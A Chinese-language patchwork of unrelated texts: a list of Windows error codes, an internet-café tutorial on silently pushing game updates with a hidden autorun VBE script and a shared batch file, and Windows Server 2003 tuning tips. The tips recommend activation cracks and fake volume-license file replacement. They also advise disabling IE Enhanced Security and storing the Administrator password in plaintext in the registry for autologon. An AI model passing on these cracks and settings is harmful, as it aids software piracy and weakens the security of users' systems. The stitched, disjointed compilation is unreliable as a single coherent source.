1617 设备已被删除。
1618 正在进行另一个安装操作。请在继续这个安装操作之前完成那个操作。
1619 未能打开这个安装程序包。请验证程序包是否存在，是否可以访问；或者与应用程序供应商联系，验证这是否是有效的 Windows 安装程序包。
1620 未能打开这个安装程序包。请与应用程序供应商联系，验证这是否是有效的 Windows 安装程序包。
1621 启动 Windows 安装服务用户界面时有错误。请与技术支持人员联系。
1622 打开安装日志文件时出错。请验证指定的日志文件位置是否存在，是否可以写入。
1623 安装程序包的语言不受系统支持。
1624 应用变换时出错。请验证指定的变换路径是否有效。
1625 系统策略禁止这个安装。请与系统管理员联系。
1626 无法执行函数。
1627 执行期间，函数出了问题。
1628 指定了无效的或未知的表格。
1629 提供的数据类型不对。
1630 这个类型的数据不受支持。
1631 Windows 安装服务未能启动。请与技术支持人员联系。
1632 临时文件夹已满或无法使用。请验证临时文件夹是否存在，是否可以写入。
1633 这个处理器类型不支持该安装程序包。请与产品供应商联系。
1634 组件没有在这台计算机上使用。
1635 无法打开修补程序包。请验证修补程序包是否存在，是否可以访问；或者与应用程序供应商联系，验证这是否是有效的 Windows 安装修补程序包。
1636 无法打开修补程序包。请与应用程序供应商联系，验证这是否是有效的 Windows 安装修补程序包。
1637 Windows 安装服务无法处理这个修补程序包。您必须安装含有 Windows 安装服务新版本的 Windows Service Pack。
1638 已安装这个产品的另一个版本。这个版本的安装无法继续。要配置或删除这个产品的现有版本，请用“控制面板”上的“添加/删除程序”。
1639 无效的命令行参数。有关详细的命令行帮助，请查阅 Windows 安装服务的 SDK。
1640 在终端服务远程会话期间，只有管理员有添加、删除或配置服务器软件的权限。如果您要在服务器上安装或配置软件，请与网络管理员联系。
1641 要求的操作已成功结束。要使改动生效，必须重新启动系统。
1642 Windows 安装服务无法安装升级修补程序，因为被升级的程序丢失，或者升级修补程序将更新此程序的其他版本。请确认要被升级的程序在您的计算机上且您的升级修补程序是正确的。
1700 串绑定无效。
1701 绑定句柄的类型错误。
1702 绑定句柄无效。
1703 不支持 RPC 协议顺序。
1704 RPC 协议序列无效。
1705 字符串的全球唯一标识符(UUID)无效。
1706 终点的格式无效。
1707 网络地址无效。
1708 未找到终点。
1709 超时设置值无效。
1710 找不到该对象的全球唯一标识符(UUID)。
1711 该对象的全球唯一标识符(UUID)已经注册。
1712 这一类型的全球唯一标识符(UUID)已经注册。
1713 RPC 服务器正在监听。
1714 尚未注册协议顺序。
1715 RPC 服务器不处于监听状态。
1716 管理程序的类型未知。
1717 接口未知。
1718 没有绑定。
1719 没有协议序列。
1720 无法创建终点。
1721 资源不足，无法完成该操作。
1722 RPC 服务器无法使用。
1723 RPC 服务器太忙，无法完成此项操作。
1724 网络选项无效。
1725 该线程中不存在活动的远程过程调用。
1726 远程过程调用失败。
1727 远程过程调用失败并且无法执行。
1728 远程过程调用(RPC)协议出现错误。
1730 RPC 服务器不支持传输语法。
1732 不支持这种类型的全球唯一标识符。
1733 标识无效。
1734 数组边界无效。
1735 绑定类型中不包含项目名。
1736 名称语法无效。
1737 不支持这种命名语法。
1739 没有可用的网络地址，无法创建全球唯一标识符(UUID)。
1740 终结点重复。
1741 身份验证类型未知。
1742 调用次数的上限太小。
1743 字符串太长。
1744 找不到 RPC 协议序列。
1745 过程号超出范围。
1746 此次绑定不包含任何身份验证信息。
1747 身份验证服务未知。
1748 身份验证级别未知。
1749 安全描述符无效。
1750 身份验证服务未知。
1751 项目无效。
1752 服务器的终结点无法执行此项操作。
1753 终点的映射器没有更多的终点可用。
1754 没有导出任何接口。
1755 项目名不完整。
1756 版本选项无效。
1757 没有其他成员。
1758 可以导出全部内容。
1759 未找到接口。
1760 项目已经存在。
1761 项目找不到。
1762 名称服务不可用。
1763 网络地址集无效。
1764 不支持请求的操作。
1765 没有可供冒仿的安全性描述符。
1766 远程过程调用(RPC)出现内部错误。
1767 RPC 服务器企图进行整除零运算。
1768 RPC 服务器出现寻址错误。
1769 RPC 服务器中的浮点运算造成被零除。
1770 RPC 服务器产生了浮点下溢错误。
1771 RPC 服务器产生了浮点上溢错误。
1772 可用于自动句柄绑定的 RPC 服务器列表已经用完。
1773 无法打开字符转换表文件。
1774 包含字符转换表的文件小于 512 个字节。
1775 在远程过程调用中，客户机向主机传送了一个空的描述体句柄。
1777 远程过程调用中的描述体句柄发生变化。
1778 发送到远程过程调用的绑定句柄不匹配。
1779 占位程序无法获得远程过程调用的句柄。
1780 将空的参考指针发送给占位程序。
1781 列举值超出范围。
1782 字节数目太小。
1783 占位程序接收到错误数据。
1784 所提供的用户缓冲区对所申请的操作无效。
1785 无法识别磁盘媒体。它可能还未格式化。
1786 工作站没有信任密码。
1787 服务器上的安全数据库中没有该工作站信任关系的计算机帐户。
1788 建立主域和受托域间的信任关系失败。
1789 建立工作站和主域间的信任关系失败。
1790 网络登录失败。
1791 该线程执行过程中已经进行了远程过程调用。
1792 试图登录网络，但网络登录服务尚未启动。
1793 用户帐户已到期。
1794 重定向程序正在使用，无法卸载。
1795 已经安装所指定的打印机驱动程序。
1796 指定的端口未知。
1797 打印机驱动程序未知。
1798 打印处理程序未知。
1799 指定的分隔符文件无效。
--------------------------------------------------------------------------------
 
--  
  19:57:55

-- 
1800 指定的优先级无效。
1801 打印机名无效。
1802 打印机已经存在。
1803 打印机命令无效。
1804 指定的数据类型无效。
1805 指定的环境无效。
1806 没有其他绑定。
1807 使用的帐户是跨网络的信任帐户。请使用全局用户帐户或本地用户帐户来访问此服务器。
1808 所使用的帐户是计算机帐户。请使用全局用户帐户或本地用户帐户来访问该服务器。
1809 使用的帐户是服务器信任帐户。请使用全局用户帐户或本地用户帐户来访问该服务器。
1810 指定的域名或安全标识符与域的信任信息不一致。
1811 服务器正在使用中，无法卸载。
1812 指定的映像文件不包含资源部分。
1813 在映像文件中找不到指定的资源类型。
1814 在映像文件中找不到指定的资源名称。
1815 在映像文件中找不到指定的资源语言 ID 。
1816 可用的配额不足，无法执行该命令。
1817 没有已注册的接口。
1818 远程过程调用被取消。
1819 绑定句柄不包含所有需要的信息。
1820 远程调用过程中发生通讯失败。
1821 所需的身份验证级别不被支持。
1822 主要的名称没有注册。
1823 指定的错误不是有效的 Windows RPC 错误代码。
1824 已分配仅在本机上有效的 UUID。
1825 产生了特定的安全包错误。
1826 没有取消线程。
1827 在编码/解码处理时的操作无效。
1828 序列化软件包的版本不兼容。
1829 RPC 占位程序的版本不兼容。
1830 RPC 管道对象无效或已损坏。
1831 试图在 RPC 管道对象上进行无效操作。
1832 不被支持的 RPC 管道版本。
1898 找不到组成员。
1899 无法创建终结点映射数据库条目。
1900 对象的全球标识符(UUID)为空。
1901 指定的时间无效。
1902 指定的表单名无效。
1903 指定的表单大小无效。
1904 指定的打印机句柄正在等候处理
1905 指定的打印机已经删除。
1906 打印机的状态无效。
1907 用户首次登录前，必须先更改其密码。
1908 找不到该域的域控制器。
1909 引用的帐户目前被锁定，可能无法登录。
1910 没有发现指定的此对象导出者。
1911 没有发现指定的对象。
1912 没有发现指定的对象解析器。
1913 一些待发数据仍停留在请求缓冲区内。
1914 无效的异步远程过程调用句柄。
1915 这个操作的异步 RPC 调用句柄不正确。
1916 RPC 管道对象已经关闭。
1917 RPC 调用在全部的管道都被处理之前完成。
1918 没有其他可用的数据来自 RPC 管道。
1919 这个机器没有可用的站点名。
1920 系统无法访问此文件。
1921 系统无法解析文件名。
1922 项目不是所要的类型。
1923 无法将所有对象的 UUID 导出到指定的项。
1924 无法将接口导出到指定的项。
1925 无法添加指定的配置文件项。
1926 无法添加指定的配置文件元素。
1927 无法删除指定的配置文件元素。
1928 无法添加组元素。
1929 无法删除组元素。
2000 像素格式无效。
2001 指定的驱动程序无效。
2002 该操作的窗口样式或类属性无效。
2003 不支持请求的图元文件操作。
2004 不支持请求的转换操作。
2005 不支持请求的剪辑操作。
2010 指定的颜色管理模块无效。
2011 指定的颜色文件配置无效。
2012 找不到指定的标识。
2013 所需的标识不存在。
2014 指定的标识已经存在。
2015 指定的颜色文件配置与任何设备都不相关。
2016 找不到该指定的颜色文件配置。
2017 指定的颜色空间无效。
2018 图像颜色管理没有启用。
2019 在删除该颜色转换时有一个错误。
2020 指定的颜色转换无效。
2021 指定的转换与位图的颜色空间不匹配。
2022 指定的命名颜色索引在配置文件中不存在。
2108 网络连接已成功，但需要提示用户输入一个不同于原始指定的密码。
2202 指定的用户名无效。
2250 网络连接不存在。
2401 在这个网络连接上已存在打开的文件或未处理的请求。
2402 活动的连接仍然存在。
2404 设备正由活动进程使用，无法断开连接。
3000 指定的打印监视程序未知。
3001 指定的打印机驱动程序正在使用中。
3002 找不到假脱机文件。
3003 没有发出 StartDocPrinter 调用。
3004 尚未发出 AddJob 调用。
3005 指定的打印处理程序已经安装。
3006 指定的打印监视程序已经安装。
3007 该指定的打印监视器不具备所要求的功能。
3008 指定的打印机监视器正在使用中。
3009 当打印机有作业排成队列时此操作请求是不允许的。
3010 请求的操作成功。只有重新启动系统，更改才会生效。
3011 请求的操作成功。只有重新启动服务，更改才会生效。
3012 找不到打印机。
4000 WINS 在处理命令时遇到执行错误。
4001 无法删除本地的 WINS。
4002 从文件引入失败。
4003 备份失败。以前执行过完整的备份吗?
4004 备份失败。请检查备份数据库的目标目录。
4005 名称在 WINS 数据库中不存在。
4006 不允许进行未配置部分的复制。
4100 DHCP 客户获得一个在网上已被使用的 IP 地址。直到 DHCP 客户可以获得新的地址前，本地接口将被禁用。
4200 WMI 数据提供程序不能识别传来的 GUID 是否有效。
4201 WMI 数据提供程序无法识别传来的实例名是否有效。
4202 WMI 数据提供程序无法识别传来的数据项目标识符是否有效。
4203 无法完成 WMI 请求，请重试一次。
4204 找不到 WMI 数据提供程序。
4205 WMI 数据提供程序引用到一个未注册的实例组。
4206 WMI 数据块或事件通知已启用。
4207 WMI 数据块不再可用。
4208 WMI 数据服务无法使用。
4209 WMI 数据提供程序无法完成请求。
4210 WMI MOF 信息无效。
4211 WMI 注册信息无效。
4212 WMI 数据块或事件通知已禁用。
4213 WMI 数据项目或数据块为只读。
4214 WMI 数据项目或数据块不能更改。
6118 该工作组的服务器列表当前不可用。
6200 要正常运行，任务计划程序服务的配置必须在系统帐户中运行。单独的任务可以被配置成在其他帐户中运行。
7001 指定的会话名无效。
7002 指定的协议驱动程序无效。
7003 在系统路径上找不到指定的协议驱动程序。
7004 在系统路径上找不到指定的终端连接驱动程序。
7005 不能为这个会话创建一个事件日志的注册键。
7006 同名的一个服务已经在系统中存在。
7007 在会话上一个关闭操作挂起。
7008 没有可用的输出缓冲器。
7009 找不到 MODEM.INF 文件。
7010 在 MODEM.INF 中没有找到调制解调器名称。
7011 调制解调器没有接受发送给它的指令。验证配置的调制解调器与连接的调制解调器是否匹配。 7012 调制解调器没有响应发送给它的指令。验证该调制解调器是否接线正确并且打开了电源开关。
7013 由于断开连接，载波检测失败或载波停止。
7014 在要求的时间内没有发现拨号音。确定电话线连接正确并可使用。
7015 在远程站点回叫时检测到了占线信号。
7016 在回叫时远程站点上检测到了声音。
7017 传输驱动程序错误
7022 找不到指定的会话。
7023 指定的会话名称已处于使用中。
7024 由于终端连接目前正在忙于处理一个连接、断开连接、复位或删除操作，无法完成该请求的操作。
7025 试图连接到其视频模式不受当前客户支持的会话。
7035 应用程序尝试启动 DOS 图形模式。不支持 DOS 图形模式。
7037 您的交互式登录权限已被禁用。请与您的管理员联系。
7038 该请求的操作只能在系统控制台上执行。这通常是一个驱动程序或系统 DLL 要求直接控制台访问的结果。
7040 客户未能对服务器连接消息作出响应。
7041 不支持断开控制台会话。
7042 不支持重新将一个断开的会话连接到控制台。
7044 远程控制另一个会话的请求被拒绝。
7045 拒绝请求的会话访问。
7049 指定的终端连接驱动程序无效。
7050 不能远程控制请求的会话。这也许是由于该会话被中断或目前没有一个用户登录。另外，您不能从该系统控制台远程控制一个会话或远程控制系统控制台。并且，您不能远程控制您自己的当前会话。
7051 该请求的会话没有配置成允许远程控制。
7052 连接到这个终端服务器的申请被拒绝。终端服务器客户许可证目前正在被另一个用户使用。请与系统管理员联系，获取一份新的终端服务器客户，其许可证号码必须是有效的、唯一的。
7053 连接到这个终端服务器的申请被拒绝。还没有为这份终端服务器客户输入您的终端服务器客户许可证号码。请与系统管理员联系，为该终端服务器客户输入一个有效的、唯一的许可证号码。
7054 系统已达到其授权的登录限制。请以后再试一次。
7055 您正在使用的客户没有使用该系统的授权。您的登录请求被拒绝。
7056 系统许可证已过期。您的登录请求被拒绝。  
--------------------------------------------------------------------------------

我们都知道同步更新软件分成两部分，一个服务端一个客户端。我用批处理也是分成两部分，服务端和客户端。当然也可以只有服务端，那就是用推技术把资源从服役端推向客户机，但客户机得开共享。开共享是很不安全的。所以采用拉的技术。在客户端放个批处理，开机后就从务服端拉资源过来。你也许会说这个同步软件不一样了吗？是的啊，方法是一样的。但我要问问你，即然系统本身就有这个功能，我们为什么不用，非要去找个第三方软件来实现呢，何况第三方软件大多是要付费的。我们应该更专注天发掘系统本身的功能而不是到处找第三方软件。也许你又会说DOS批处理我不会用，不会DOS。不会那就看完这篇文章好好学学啊。 一重起什么都不同了晕

首先讲客户机上的，很简单就一行文字，我们将客户机上的批处理文件命名为b.vbe放在哪个盘你自己决定， 我这里就C:\b.vbe（这里你又晕了，怎么又出了个vbe的文件啊，什么东西啊，是个WINDOWS脚本文件来的，这样啊,那能用vbs吗?不能,我希望别用,如果你机子上装了,(豪杰超级解霸)
这个软件的话是行不通的,不相信我们建立个vbs的文件看看,呵呵,不行了吧)运行后就直接运行播放器了
昏厥
建立vbe文件,目的是让我们的批处理文件在启动的时候不显示要将它放在机子的启动项目中开机就能自动运行它。当然也可以放在别的地方，那你就得在注册表中建个项

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"AutoUp"="C:\\b.vbe"

或

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"AutoUp"="C:\\b.vbe"
或
C:\Documents and Settings\(用户名)\ 「开始」菜单\程序\启动\AutoUp.bat

总之你要让它能起机就自动运行就可以了，我呢是放在

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"AutoUp"="C:\\b.vbe"

，这只适用于WIN2000 WinXp,WIn2003.

b.vbe的内容也简单，就是调用服务端的批处理，那以后有什么更新就都在服务端上做变动。

set ws=wscript.createobject("wscript.shell")
ws.run "\\020-work\E\b\b.bat /start",0

这里可以看出来了在服务端的批处理名字就是b.bat,最后一个0是静态运行文件 如果要显示就改成1

下一步就说它的内容，
意思是调用020-work(主机名) 这台机子的 b.bat的批处理文件

服务端批处理的内容：
@echo off
if exist C:\0907.inf goto NO

@del c:\0825.inf
@copy \\020-work\E\a\0907.inf c:\

regedit/s \\020-work\E\最新更新包\劲舞团\2k.reg
start/w \\020-work\E\最新更新包\劲舞团\劲舞团.exe
start/w \\020-work\E\最新更新包\梦幻西游\梦幻西游.exe
start/w \\020-work\E\最新更新包\热血江湖\热血江湖128.exe
start/w \\020-work\E\最新更新包\刀剑\刀剑063.exe
rd/s/q C:\Progra~1\flashget
exit

:no
exit

我们一句句的看，@echo off 是隐藏命令显示，

del 是DOS下的删除命令，因为有更新所以就得把本机的更新标志换成新的，当然也可以用Rename改名。我用的是复制新的删掉旧的。

If exist 用来判断后来的文件是否存在，如果存在就表明巳更新过了直接跳到后面NO部分。
IF是个判断语句，学过编程的都知道GOTO就是转跳的意思，那个0907.inf 只不过是个标志文件，用记事本建个空文件另存为INF文件就行了，也可以是别的TXT。XXX。GGG等，后缀名你愿意怎么取就怎么取。(这句总的说就是,探测需要更新的电脑上有没有0907.inf这个文件,如果有了,就不会再次更新,如果没有则更新

regedit/s 是dos下 导入注册表文件,就用不着去用手点了,知道吗,劲舞团这游戏没这个注册表文件,加不了歌的....

Start/w，/w是WAIT等待的意思，就是执行完此命令再执行下一个，如果没有/w就会一起全部执行了，Dos命令执行得很快的，你会说那是好事，但WIN下面的自解压包总要用时间吧，同时执行机子会很卡的，如果有大的压缩包很有可能会死机的。懂了吗?

RD/s/q是NT系统下的命令，在WIN98下应该用DelTree/y，/Q就是询问的意思，不用确认就执行/S是除了删除目录本身外，还删掉目录下面的文件及文件夹。

Exit是退出命令窗口，关闭命令窗口的意思，只在NT系统下有用在Win98下没效果。得手动退出。

注意NO前面有个冒号的,是：NO

命令就讲完了不懂的去看看DOS命令详解。或者去我社区看看http://qq163.cku.cn/

看到这里又有疑问了你怎么得到更新包的，是去下载的还是自己做，答案是自己做的，怎么做？累了
下面的我在后面的一个教程里补上来吧 连续24小时没走开这里了

那我们得用到一个工具软件那就是BC2，全名：BeyondCompare_227_SC227_SC ，在本站就有下载，很小巧的软件。要游戏更新前，我们先将有更新的游戏文件夹复制一分出来，更新其中一份，然后用此软件对比抓包，抓出不同文件，即更新了哪些文件。把有更新的文件复制到新的文件夹中用WinRar 做成自解压包，指定好要解压的路径，用Winrar中的“隐藏启动对话框”，“覆盖所有文件”。
如果你不在本机复制一分作对比也可以在别的机子上开个共享做两机同一游戏的对比工作。

怎么进入DOS命令行，在WIn9X系统下运行COMMAND，或建一个文本文件另存为.BAT格式，里面写上Command，在NT系统2000，XP，2003下则用CMD就可以了

无论怎么做结果都一样，做网管的都是烦在保存这一步上面，保存就有点烦，因为有还原卡。人总得要到下面机子上开机关机的，要跑路，用批处理的话尽量减轻劳动量。(别急,偶照样有办法解决,呵呵,主要一般都是更新个网络游戏,是吗,也就是说一个盘不受保护这样就可以了
,记得把这个盘做个ghost文件备份,随便你啦
我的盘是受保护的,二个多月搞一次更新,也没事啦!

好了全部就讲完了，各位看了有什么想法，用了有什么体会要记得反馈给我依水磐石哟。在哪里反馈啊? 去我的社区吧!http://qq163.cku.cn
也许你看了会说这么麻烦啊，是啊，批处理更新就是准备工作做得多，后面更新的时候几乎不用动鼠标了。比起同步软件来省去了用鼠标点来点去的烦人。如果你对DOS命令很有兴趣的话可以和我交流一下。
如果你觉得不好，请不要说什么了 你高手，我也没办法 但请谦虚。。谢谢

　　一、取消自动保存设置

　　Windows Server 2003作为新一代的网络操作系统具有自己独有的设备管理模式，在调用应用程序出现错误时，系统中的Dr. Watson会自动将一些重要的调试信息保存起来，以便日后维护系统时查看。但是这些信息随时也有被黑客窥视的可能，为了重要的调试信息的整体安全，我们应该取消Dr. Watson自动保存调试信息的设置。具体步骤如下：首先打开开始菜单，选中“运行”命令，在随后打开的运行对话框中，输入注册表编辑命令“ergedit”命令，打开一个注册表编辑窗口；二是在该窗口中，用鼠标依次展开HKEY_local_machine＼software＼Microsoft＼WindowsdowsNT＼CurrentVersion＼AeDebug分支，在对应AeDebug键值的右边子窗口中，用鼠标双击Auto值，在弹出的参数设置窗口中，将其数值重新设置为“0”。三是打开系统的Windows资源管理器窗口，并在其中依次展开Documents and Settings文件夹、All Users文件夹、Shared Documents文件夹、DrWatson文件夹，最后将对应DrWatson中的User.dmp文件、Drwtsn32.log文件删除掉。在完成上面的设置后，只需重新启动一下系统即可。今后你不用再担心自动保存设置出现问题了。

　　二、取消对网站的安全设置

　　新安装好Windows Server 2003操作系统在默认状态下，会将IE的安全访问级别设置为“高”，当你打开IE后，会弹出提示窗口，提示我们，是否需要将当前访问的网站添加到自己信任的站点中去；要是你不信任的话将无法对Internet进行浏览和文件下载，每次访问网页，都要经过这样的步骤。如此一来，不但会大大降低网页访问效率而且很麻烦，为此你可以按下面步骤，来取消安全提示：首先要依次执行“开始”/“设置”/“控制面板”命令，在打开的控制面板窗口中，用鼠标双击“添加和删除程序”图标，将界面切换到“添加和删除Windows组件”页面中；二是用鼠标选中“Internet Explorer增强的安全配置”选项，继续单击下一步按钮，就能将该选项从系统中删除了；最后再单击一下“完成”按钮，退出组件删除提示窗口。从今往后，你再上网的时候，IE就不会自动去检查网站的安全性了，重新设置以后你感觉是不是方便多了。
 

--------------------------------------------------------------------------------
 
  　　三、取消资源共享设置

　　Windows Server 2003在网络操作系统方面较Windows 2000有了很大增强，也为局域网用户在相互之间的传输信息方面带来极大方便，比如为用户提供了文件和打印共享功能等。但是不要忘了，在我们享受该功时的时候，也为黑客们提供了可乘之机，给服务器系统带来了潜在的危险。大家要注意，在用完文件或打印共享功能时，要随时将共享功能关闭—以防万一。具体步骤如下：首先执行控制面板菜单项下面的“网络连接”命令，在出现的窗口中，用鼠标右键单击“本地连接”图标；二是在打开的快捷菜单中，单击“属性”命令，这样就能打开一个“Internet协议(TCP/IP)”属性设置对话框；三是在该界面中取消“Microsoft网络的文件和打印机共享”这个选项即可；完成以上设置以后，本地计算机就没有办法对外提供文件与打印共享服务了，实践证明这种方法是很有效果的。

　　四、取消用户切换设置

　　Windows 2003系统为我们提供了快速用户切换功能，利用该功能我们可以很轻松地登录到系统中。不过，在享受这种轻松时的背后，也给你的系统带来了安装上的隐患，例如我们在执行系统“开始”菜单中的“注销”命令，“切换用户”时，如果再使用传统的方式来登录系统的话，系统很有可能会把本次登录当作错误处理，Windows2003系统就可能将当前登录的帐号当作非法帐号，将它锁定起来，给我们带来了很多的麻烦；遇到这种情况，我们可以按如下步骤来避免系统产生的安全隐患：首先在Windows 2003系统桌面中，单击开始菜单下面的“控制面板”命令，找到下面的“管理工具”命令，再执行下级菜单中的“计算机管理”命令，找到“用户帐户”图标，并在随后出现的窗口中单击“更改用户登录或注销的方式”；在打开的设置窗口中，将“使用快速用户切换”选项取消即可。

　　五、取消关机原因的设置

　　每次需要关闭系统时，Win2003系统总是要你选择关机原因，对于个人用户来说，非常麻烦！而且也没有多么大的使用意义，可禁用该功能：（1）使用组策略法：在“开始→运行”中键入“gpedit.msc”打开组策略窗口，展开“‘本地计算机’策略→计算机配置→管理模板→系统”，接着双击“显示‘关闭事件跟踪程序’”项，在弹出窗口中勾选“已禁用”项即可。（2）使用注册表法：在“开始→运行”中键入“Regedit”打开“注册表编辑器”，展开分支“HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftwindows NT”，新建一个名为“Reliability”的项，接着新建一个名为“ShutdownReasonOn”的DWORD值，将它的值设为0即可。（３）使用系统设置法：打开“控制面板→电源选项”，进入“高级”选项卡，在其中的“电源按钮”设置区域中，将“在按下计算机电源按钮时”设置为“关机”，然后单击“确定”按钮即可。这样，以后在关机时，直接按下机箱上的电源按钮，计算机就会在保存配置后直接关闭了。经过以上设置以后，在你关闭系统的时候，不再会有麻烦了。

　　六、其它

　　Windows Server 2003作为新一代的网络操作系统具有自己独有的设备管理模式，在安装硬件驱动程序时一定要使用经微软认证获得数字签名的驱动程序，以确保系统的稳定性和兼容性。而且在管理性方面较Windows 2000有了很大增强，利用“配置您的服务器”和“管理您的服务器”向导，即可简单、方便、有效的进行服务器角色的安装和管理。

 
 
 
【简 介】
　　Windows　2003的系列优化方法 
 

--------------------------------------------------------------------------------
 
  　　一、windows server 2003 3790版本识别

　　RTM=release to manufacture （公开发行批量生产）是给硬件制造商的版本！是送去压盘的,不是拿去卖的。

　　OEM=Original Equipment Manufacturer只能全新安装， 和RTM差不多，只是称呼不同而已。

　　RTL=retail（零售）正式零售版,可以升级或者全新安装。

　　VLK=Volume License大量授权版，又称为企业版。无需激活。(网上所谓的简体中文VLK版

　　实际是普通简体中文版加英文VLK版中的8个文件而已)

　　二、Windows Server 2003的不同版本

　　Windows Server 2003 Web版:为快速开发、部署Web服务与应用程序，提供Web托管与服务平台。支持2路

　　SMP(对称多处理)系统、2GB内存。

　　Windows Server 2003标准版:面向中小型企业和部门级应用。支持4路SMP、4GB内存。

　　Windows Server 2003企业版:适合中心与大型组织使用，有32位和64位两个版本。支持8节点集群、NUMA；

　　支持8路SMP，其中32位版支持32GB内存，64位版支持64GB内存。

　　Windows Server 2003数据中心版：面向要求强伸缩性和高可用性的企业，有32位和64位两个版本。32位版

　　支持32路SMP、64GB内存；64位版支持64路SMP、512GB内存；两个版本均支持8节点集群、NUMA 　

　　三、windows server 2003 3790版的激活 　　

　　在正式版算号器没有出来之前，现在流行的激活方式有以下几种：

　　（1）Reset5.02，在安全模式下运行即可激活，把时间调整为2008年都没有问题，一切使用正常。可以升级。

　　缺点：激活程序被彻底屏蔽，表现为运行msoobe /a没有任何显示，并且在服务中有一项reset5，开机会自动运

　　行此服务，C:\WINDOWS\system32\srvany.exe，此程序应该是reset5添加入系统的。 　　

　　（2）俄罗斯破解，记得在xp时代，只要把setupreg.hiv在安装前替换，然后电话激活就可以达到完美的激活境

　　界，可在2003下，这样子做之后，当前显示已激活，可如果你调整了时间再开机又会显示要激活，甚至是不能

　　使用。估计次次问题关键还是在那个setupreg.hiv文件。 　　

　　（3）在论坛上有人贴出了一个Winxpactivation.exe的文件，号称可以激活，实际上这个还是假激活，暂时屏

　　蔽了激活程序，是不能够修改时间的。 　　

　　（4）用替换法做出来的伪VLK，安装使用都没有问题，只是不能升级。VLK是替换英文版的8个文件.但是SN已经

　　被微软封掉了.所以不能升级，但是此法是最稳定的，没有任何问题。 　　

　　结论：推荐大家用8个替换法激活和reset5.02激活！ 　

　　四、win 2003 server的一些优化设置 　　

　　1.禁用配置服务器向导: 　　

　　禁止“配置你的服务器”（Manage Your Server）向导的出现：在控制面板（Control Panel） -> 管理员工具

　　（Administrative Tools ）-> 管理你的服务器（Manage Your Server）运行它，然后在窗口的左下角复选“

　　登录时不要显示该页”（Don't display this page at logon）。 　　

　　2.启用硬件和DirectX加速 　　

　　★硬件加速：桌面点击右键－－属性（Properties） -> 设置（Settings ）－－高级（ Advanced ）－－

　　疑难解答（Troubleshoot）。把该页面的硬件加速滚动条拉到“完全”（ Full），最好点击“确定”（OK）保

　　存退出。这期间可能出现一瞬的黑屏是完全正常。 　　

　　★DirectX加速：打开“开始”（Start） -> “运行”（Run），键入“dxdiag”并回车打开“DirectX 诊

　　断工具”（DirectX Tools），在“显示”（Display）页面，点击DirectDraw, Direct3D and AGP Texture 加

　　速三个按钮启用加速。把“声音的硬件加速级别”（Hardware Sound Acceleration Level）滚动条拉到“完全

　　加速”（ Full Acceleration）。 　　

　　3. 启用声卡： 　　

　　系统安装后，声卡是禁止状态，所以要在 控制面板 -> 声音 -> 启用，重启之后再设置它在任务栏显示。

　　如果你使用的是Windows server 2003标准版请从第二步xx作，因为标准版已允许声音服务。

　　★打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，在出现的窗口中找到

　　“Windows Audio”并双击它，然后在启动模式（startup type ）的下拉菜单选择“自动”ˋutomatic），

　　并点击“应用”（Apply） ->“开始”（Start） -> “确定”（OK） 　　

　　★打开“开始”（Start） -> “运行”（Run），键入“dxdiag”并回车打开“DirectX 诊断工具”

　　（DirectX Tools），在“Sound”（Display）页面，把“声音的硬件加速级别”

　　（Hardware Sound Acceleration Level）滚动条拉到“完全加速”（ Full Acceleration）。　

　　4. 如何启用 ASP 支持： 　　

　　Windows Server 2003 默认安装，是不安装 IIS 6 的，需要另外安装。安装完 IIS 6，

　　还需要单独开启对于 ASP 的支持。方法是： 控制面板 -> 管理工具 ->

　　Web服务扩展 -> Active Server Pages -> 允许。 　　

　　5. 如何启用 XP 的桌面主题： 　　

　　★打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，选themes“主题”（默认是禁止的）

　　，然后改为“自动”，按“应用”，选“开启”。

　　★接着点“桌面”的属性，在“主题”里选“windows xp”

　　★我的电脑----属性----高级----性能-----在桌面上为图标标签使用阴影  

-----------------------------------
 
  　　6. 禁止关机时出现的关机理由选择项： 　　

　　关机事件跟踪（Shutdown Event Tracker）也是Windows server 2003区别于其他工作站系统的一个设置，

　　对于服务器来说这是一个必要的选择，但是对于工作站系统却没什么用，我们同样可以禁止它。

　　打开”开始“Start ->”运行“ Run ->输入”gpedit.msc “，在出现的窗口的左边部分，

　　选择 ”计算机配置“（Computer Configuration ）-> ”管理模板“（Administrative Templates ）

　　-> ”系统“（System）,在右边窗口双击“Shutdown Event Tracker” 在出现的对话框中选择“禁止”

　　（Disabled），点击然后“确定”（OK）保存后退出，这样，你将看到类似于windows 2000的关机窗口 　　

　　7. 如何使用USB硬盘、U盘，添加已经有分区的硬盘 　　

　　我的电脑（单击右键）----管理----磁盘管理-----在相应的硬盘上执行导入和分配盘符操作 　

　　8. 在控制面板里显示全部组件：

　　把 Windows\inf 目录中的 sysoc.inf 文件里的 "hide" 替换掉。 　　

　　9.禁用Internet Explorer Enhanced Security 和禁止安全询问框的出现

　　在IE工具选项中自定义设置IE的安全级别。在”安全“（Security）选项卡上拉动滚动条把Internet区域

　　安全设置为”中“（Medium）或“中低”。自定义设置中将有关的选择“提示”修改为选择“禁止”或“启用”。 　　

　　10. 禁用开机 CTRL+ALT+DEL和实现自动登陆 　　

　　★方法1：打开注册表(运行->“Regedit”)，再打开:

　　HKEY_LOCAL_MACHIN　SOFTWARE　MicroSoft　Windows NT　CurrentVersion 　Winlogon段，在此段中按右键，新建

　　二个字符串段，AutoAdminLogon=“1”，DefaultPassword=“为超级用户Administrator所设置的Password”。

　　注意，一定要为Administrator设置一个密码，否则不能实现自启动。 然后，重新启动Windows即可实现自动登录。 　

　　★方法2：管理工具 -> Local Security Settings（本地安全策略） -> 本地策略 -> 安全选项 ->

　　interactive logon: Do not require CTRL+ALT+DEL，启用之。 　　

　　★方法3（自动登陆）：使用Windows XP的Tweak UI来实现Server 2003自动登陆。

　　下载：Tweak UI http://www.ssite.org/uppic/sun_pic/...003/tweakui.exe

　　下载后直接执行tweakui.exe 在左边的面板中选择Logon -> Autologon -> 在右边勾选Log on automatically

　　at system startup输入你的用户名和域名（如果没有就不写），点击下面的Set Password，输入用户名的密码

　　，然后点击OK。 　　

　　11.隐藏文件 　　

　　Windows Server 2003默认情况下是显示所有的文件夹的，如果你不想这样，可以通过一下方法来隐藏：

